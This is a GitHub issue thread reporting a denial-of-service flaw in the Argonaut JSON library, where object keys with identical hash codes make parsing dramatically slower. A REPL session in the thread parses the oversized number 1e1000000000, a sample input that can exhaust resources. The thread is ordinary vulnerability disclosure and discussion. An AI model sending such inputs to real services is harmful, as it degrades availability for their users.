-
Notifications
You must be signed in to change notification settings - Fork 108
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Denial of service when parsing JSON object with keys that have the same hash code #314
Comments
@plokhotnyuk - I wasn't able to reproduce it in: $amm
Loading...
Welcome to the Ammonite Repl 1.0.3
(Scala 2.12.4 Java 1.8.0_121)
If you like Ammonite, please support our development at www.patreon.com/lihaoyi
@ import $ivy.`io.argonaut::argonaut:6.2.2`
import $ivy.$
@ import argonaut._, Argonaut._
import argonaut._, Argonaut._
@ case class Foo(num: BigDecimal)
defined class Foo
@ val str = """{ "num" : 1e1000000000}"""
str: String = "{ \"num\" : 1e1000000000}"
@ val json = str.parse
json: Either[String, Json] = Right(JObject(JsonObjectInstance(Map("num" -> JNumber(JsonDecimal("1e1000000000"))), Vector("num"))))
@ val jsonUnsafe = json.right.get
jsonUnsafe: Json = JObject(JsonObjectInstance(Map("num" -> JNumber(JsonDecimal("1e1000000000"))), Vector("num")))
@ DecodeJson.derive[Foo].decodeJson(jsonUnsafe)
res14: DecodeResult[Foo] = DecodeResult(Right(Foo(1E+1000000000))) |
Could you please tell me how to, perhaps, modify my example to reproduce the error that you raised in this issue? |
@kevinmeredith It is a case about collisions in a hash map that is used for internal representation of JSON object like here: Please start from reproducible steps that are in description of the issue, then look in to the benchmark code to see how that messages were build or just add a printing statement to see how them look like. But, the case that was mentioned by you is also unsafe for users of the parsed message... Just try to pass the parsed value of that big decimal number to the following function and see what will happen:
|
👋 Hey folks! We've recently opened a bug bounty against this issue, so if you want to get rewarded 💰 for fixing this vulnerability 🕷, head over to https://huntr.dev! |
Sub-quadratic decreasing of throughput when number of JSON object fields (with keys that have the same hash code) is increasing
On contemporary CPUs parsing of such JSON object (with a sequence of 100000 fields like below that is ~1.6Mb) can took more than 100 seconds:
Below are results of the benchmark where
size
is a number of such fields:Reproducible Test Case
To run that benchmarks on your JDK:
sbt
and/or ensure that it already installed properly:jsoniter-scala
repo:The text was updated successfully, but these errors were encountered: